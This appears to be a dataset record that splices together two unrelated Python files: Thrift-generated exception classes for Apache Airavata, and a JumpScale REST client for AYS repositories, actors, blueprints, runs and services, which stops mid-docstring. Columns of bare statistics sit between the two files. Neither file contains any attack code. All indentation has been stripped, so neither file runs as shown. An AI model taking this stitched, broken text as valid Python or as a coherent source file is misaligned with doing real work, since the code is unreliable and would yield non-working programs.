def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ProjectNotFoundException(TException):
"""
1: optional string identifier,
2: optional string key
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ProjectNotFoundException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class InvalidRequestException(TException):
"""
    This exception is thrown for invalid requests that occur for any reason, such as missing required input parameters
    or a malformed parameter.
message: contains the associated error message.
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('InvalidRequestException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TimedOutException(TException):
"""
    This exception is thrown when the RPC timeout is exceeded.
"""
thrift_spec = (
)
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TimedOutException')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AuthenticationException(TException):
"""
This exception is thrown for invalid sshKeyAuthentication requests.
message: contains the cause of the authorization failure.
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AuthenticationException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AuthorizationException(TException):
"""
    This exception is thrown for invalid authorization requests, such as when a user does not have access to an application or resource.
message: contains the authorization failure message
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AuthorizationException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class DuplicateEntryException(TException):
"""
This exception is thrown when you try to save a duplicate entity that already exists
in the database.
message: contains the associated error message
Attributes:
- message
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'message', 'UTF8', None, ), # 1
)
def __init__(self, message=None,):
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('DuplicateEntryException')
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 1)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.message is None:
raise TProtocolException(message='Required field message is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AiravataClientException(TException):
"""
This exception is thrown by Airavata Services when a call fails as a result of
a problem that a client may be able to resolve. For example, if the user
    attempts to execute an application on a resource the gateway does not have access to.
This exception would not be used for internal system errors that do not
reflect user actions, but rather reflect a problem within the service that
the client cannot resolve.
airavataErrorType: The message type indicating the error that occurred.
must be one of the values of AiravataErrorType.
parameter: If the error applied to a particular input parameter, this will
indicate which parameter.
Attributes:
- airavataErrorType
- parameter
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'airavataErrorType', None, None, ), # 1
(2, TType.STRING, 'parameter', 'UTF8', None, ), # 2
)
def __init__(self, airavataErrorType=None, parameter=None,):
self.airavataErrorType = airavataErrorType
self.parameter = parameter
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.airavataErrorType = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.parameter = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AiravataClientException')
if self.airavataErrorType is not None:
oprot.writeFieldBegin('airavataErrorType', TType.I32, 1)
oprot.writeI32(self.airavataErrorType)
oprot.writeFieldEnd()
if self.parameter is not None:
oprot.writeFieldBegin('parameter', TType.STRING, 2)
oprot.writeString(self.parameter.encode('utf-8') if sys.version_info[0] == 2 else self.parameter)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.airavataErrorType is None:
raise TProtocolException(message='Required field airavataErrorType is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
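# Illustrative usage (editor's sketch, not part of the generated module): the
# error type comes from AiravataErrorType above; the parameter value is made up.
#   raise AiravataClientException(
#       airavataErrorType=AiravataErrorType.INVALID_AUTHORIZATION,
#       parameter='gatewayId')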
class ValidatorResult(object):
"""
Attributes:
- result
- errorDetails
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'result', None, None, ), # 1
(2, TType.STRING, 'errorDetails', 'UTF8', None, ), # 2
)
def __init__(self, result=None, errorDetails=None,):
self.result = result
self.errorDetails = errorDetails
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.result = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.errorDetails = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ValidatorResult')
if self.result is not None:
oprot.writeFieldBegin('result', TType.BOOL, 1)
oprot.writeBool(self.result)
oprot.writeFieldEnd()
if self.errorDetails is not None:
oprot.writeFieldBegin('errorDetails', TType.STRING, 2)
oprot.writeString(self.errorDetails.encode('utf-8') if sys.version_info[0] == 2 else self.errorDetails)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.result is None:
raise TProtocolException(message='Required field result is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ValidationResults(object):
"""
Attributes:
- validationState
- validationResultList
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'validationState', None, None, ), # 1
(2, TType.LIST, 'validationResultList', (TType.STRUCT, (ValidatorResult, ValidatorResult.thrift_spec), False), None, ), # 2
)
def __init__(self, validationState=None, validationResultList=None,):
self.validationState = validationState
self.validationResultList = validationResultList
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.validationState = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.validationResultList = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = ValidatorResult()
_elem5.read(iprot)
self.validationResultList.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ValidationResults')
if self.validationState is not None:
oprot.writeFieldBegin('validationState', TType.BOOL, 1)
oprot.writeBool(self.validationState)
oprot.writeFieldEnd()
if self.validationResultList is not None:
oprot.writeFieldBegin('validationResultList', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.validationResultList))
for iter6 in self.validationResultList:
iter6.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.validationState is None:
raise TProtocolException(message='Required field validationState is unset!')
if self.validationResultList is None:
raise TProtocolException(message='Required field validationResultList is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LaunchValidationException(TException):
"""
Attributes:
- validationResult
- errorMessage
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'validationResult', (ValidationResults, ValidationResults.thrift_spec), None, ), # 1
(2, TType.STRING, 'errorMessage', 'UTF8', None, ), # 2
)
def __init__(self, validationResult=None, errorMessage=None,):
self.validationResult = validationResult
self.errorMessage = errorMessage
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.validationResult = ValidationResults()
self.validationResult.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.errorMessage = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LaunchValidationException')
if self.validationResult is not None:
oprot.writeFieldBegin('validationResult', TType.STRUCT, 1)
self.validationResult.write(oprot)
oprot.writeFieldEnd()
if self.errorMessage is not None:
oprot.writeFieldBegin('errorMessage', TType.STRING, 2)
oprot.writeString(self.errorMessage.encode('utf-8') if sys.version_info[0] == 2 else self.errorMessage)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.validationResult is None:
raise TProtocolException(message='Required field validationResult is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AiravataSystemException(TException):
"""
This exception is thrown by Airavata Services when a call fails as a result of
    a problem in the service that could not be corrected through the client's actions.
airavataErrorType: The message type indicating the error that occurred.
must be one of the values of AiravataErrorType.
message: This may contain additional information about the error
Attributes:
- airavataErrorType
- message
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'airavataErrorType', None, None, ), # 1
(2, TType.STRING, 'message', 'UTF8', None, ), # 2
)
def __init__(self, airavataErrorType=None, message=None,):
self.airavataErrorType = airavataErrorType
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.airavataErrorType = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AiravataSystemException')
if self.airavataErrorType is not None:
oprot.writeFieldBegin('airavataErrorType', TType.I32, 1)
oprot.writeI32(self.airavataErrorType)
oprot.writeFieldEnd()
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 2)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.airavataErrorType is None:
raise TProtocolException(message='Required field airavataErrorType is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 34.860759
| 134
| 0.600944
| 3,610
| 33,048
| 5.270083
| 0.078947
| 0.017083
| 0.030276
| 0.026491
| 0.77929
| 0.761104
| 0.743233
| 0.720683
| 0.716373
| 0.716373
| 0
| 0.008794
| 0.298051
| 33,048
| 947
| 135
| 34.897571
| 0.81132
| 0.094832
| 0
| 0.796188
| 1
| 0
| 0.054961
| 0.013002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.007331
| 0.05132
| 0.315249
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f3621aacfc33cfdd5494d131fba331637b25078
| 15,067
|
py
|
Python
|
sandbox/lib/jumpscale/JumpScale9Lib/clients/atyourservice/ays/ays_service.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | 2
|
2017-06-07T08:11:47.000Z
|
2017-11-10T02:19:48.000Z
|
JumpScale9Lib/clients/atyourservice/ays/ays_service.py
|
Jumpscale/lib9
|
82224784ef2a7071faeb48349007211c367bc673
|
[
"Apache-2.0"
] | 188
|
2017-06-21T06:16:13.000Z
|
2020-06-17T14:20:24.000Z
|
sandbox/lib/jumpscale/JumpScale9Lib/clients/atyourservice/ays/ays_service.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | 3
|
2018-06-12T05:18:28.000Z
|
2019-09-24T06:49:17.000Z
|
from js9 import j
JSBASE = j.application.jsbase_get_class()
class AysService(JSBASE):
def __init__(self, client):
JSBASE.__init__(self)
self.client = client
def reload(self, data, headers=None, query_params=None, content_type="application/json"):
"""
reload AYS
It is method for POST /ays/reload
"""
uri = self.client._base_url + "/ays/reload"
return self.client._post(uri, data, headers, query_params, content_type)
def getActorByName(self, actor, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get an actor by name
It is method for GET /ays/repository/{repository}/actor/{actor}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/actor/"+actor
return self.client._get(uri, headers, query_params, content_type)
def updateActor(self, data, actor, repository, headers=None, query_params=None, content_type="application/json"):
"""
update an actor from a template to the last version
It is method for PUT /ays/repository/{repository}/actor/{actor}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/actor/"+actor
return self.client._put(uri, data, headers, query_params, content_type)
def listActors(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
list all actors in the repository
It is method for GET /ays/repository/{repository}/actor
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/actor"
return self.client._get(uri, headers, query_params, content_type)
def deleteRun(self, runid, repository, headers=None, query_params=None, content_type="application/json"):
"""
delete a run
It is method for DELETE /ays/repository/{repository}/aysrun/{runid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun/"+runid
return self.client._delete(uri, headers, query_params, content_type)
def getRun(self, runid, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get an aysrun
It is method for GET /ays/repository/{repository}/aysrun/{runid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun/"+runid
return self.client._get(uri, headers, query_params, content_type)
def getJob(self, jobid, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a jobid
It is method for GET /ays/repository/{repository}/job/{jobid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/job/"+jobid
return self.client._get(uri, headers, query_params, content_type)
def listJobs(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all jobs in a repo
It is method for GET /ays/repository/{repository}/job
filters are
actor:str Only list jobs of this actor
service:str Only list jobs of this service
action:str Only list jobs of this action
type:str Only list jobs with this state
serviceKey:str Only list jobs of this serviceKey
fromEpoch:int Only list jobs from this epoch
toEpoch:int Only list jobs till this epoch
tags: comma-separated list of tags to be included
fields:str comma-separated list of fields to be included in the response
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/job"
return self.client._get(uri, headers, query_params, content_type)
def executeRun(self, data, runid, repository, headers=None, query_params=None, content_type="application/json"):
"""
execute an aysrun
It is method for POST /ays/repository/{repository}/aysrun/{runid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun/"+runid
return self.client._post(uri, data, headers, query_params, content_type)
def listRuns(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
list all runs of the repository
It is method for GET /ays/repository/{repository}/aysrun
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun"
return self.client._get(uri, headers, query_params, content_type)
def createRun(self, data, repository, headers=None, query_params=None, content_type="application/json"):
"""
Create a run based on all the actions scheduled. This call returns an AYSRun object describing what is going to happen on the repository.
This is an asynchronous call. To be notified of the status of the run when the execution is finished or when an error occurs, you need to specify a callback url.
A post request will be sent to this callback url with the status of the run and the key of the run. Using this key you can inspect in detail the result of the run
using the 'GET /ays/repository/{repository}/aysrun/{aysrun_key}' endpoint
It is method for POST /ays/repository/{repository}/aysrun
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun"
return self.client._post(uri, data, headers, query_params, content_type)
def archiveBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
archive the blueprint
It is method for PUT /ays/repository/{repository}/blueprint/{blueprint}/archive
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint+"/archive"
return self.client._put(uri, data, headers, query_params, content_type)
def restoreBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
restore the blueprint
It is method for PUT /ays/repository/{repository}/blueprint/{blueprint}/restore
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint+"/restore"
return self.client._put(uri, data, headers, query_params, content_type)
def deleteBlueprint(self, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
delete blueprint
It is method for DELETE /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._delete(uri, headers, query_params, content_type)
def getBlueprint(self, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a blueprint
It is method for GET /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._get(uri, headers, query_params, content_type)
def executeBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
Execute the blueprint
It is method for POST /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._post(uri, data, headers, query_params, content_type)
def updateBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
Update existing blueprint
It is method for PUT /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._put(uri, data, headers, query_params, content_type)
def listBlueprints(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all blueprints
It is method for GET /ays/repository/{repository}/blueprint
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint"
return self.client._get(uri, headers, query_params, content_type)
def createBlueprint(self, data, repository, headers=None, query_params=None, content_type="application/json"):
"""
Create a new blueprint
It is method for POST /ays/repository/{repository}/blueprint
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint"
return self.client._post(uri, data, headers, query_params, content_type)
def destroyRepository(self, data, repository, headers=None, query_params=None, content_type="application/json"):
"""
destroy repo without deleting it from FS
It is method for POST /ays/repository/{repository}/destroy
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/destroy"
return self.client._post(uri, data, headers, query_params, content_type)
def getCurrentRun(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Inspect if a run is currently being executed
It is method for GET /ays/repository/{repository}/scheduler/running
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/scheduler/running"
return self.client._get(uri, headers, query_params, content_type)
def getSchedulerStatus(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Return status of the scheduler
It is method for GET /ays/repository/{repository}/scheduler
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/scheduler"
return self.client._get(uri, headers, query_params, content_type)
def deleteServiceByName(self, name, role, repository, headers=None, query_params=None, content_type="application/json"):
"""
delete a service and all its children
It is method for DELETE /ays/repository/{repository}/service/{role}/{name}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service/"+role+"/"+name
return self.client._delete(uri, headers, query_params, content_type)
def getServiceByName(self, name, role, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a service by its name
It is method for GET /ays/repository/{repository}/service/{role}/{name}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service/"+role+"/"+name
return self.client._get(uri, headers, query_params, content_type)
def listServicesByRole(self, role, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all services of role 'role' in the repository
It is method for GET /ays/repository/{repository}/service/{role}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service/"+role
return self.client._get(uri, headers, query_params, content_type)
def listServices(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all services in the repository
It is method for GET /ays/repository/{repository}/service
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service"
return self.client._get(uri, headers, query_params, content_type)
def getTemplate(self, name, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a template
It is method for GET /ays/repository/{repository}/template/{name}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/template/"+name
return self.client._get(uri, headers, query_params, content_type)
def listTemplates(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
list all templates
